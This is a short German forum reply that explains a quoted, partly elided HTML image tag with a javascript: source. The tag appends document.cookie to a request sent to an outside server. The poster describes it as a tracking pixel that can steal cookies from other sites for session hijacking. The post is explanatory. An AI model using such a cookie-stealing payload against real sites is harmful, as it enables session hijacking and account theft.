LX: <img src="javascript:...+escape(document.cookie);">

Beitrag lesen

Das ist ein klassischer Statistik-Pixel, welcher zudem noch die gesetzten Cookies an www.server.com übermittelt.

Und ja, man kann mit derartigem Code durchaus die Cookie-Daten von fremden Seiten stehlen, etwa zum Session-Hijacking.

Gruß, LX

--
X-Self-Code: sh:( fo:) ch:~ rl:° br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
X-Will-Answer-Email: Unusual
X-Please-Search-Archive-First: Absolutely Yes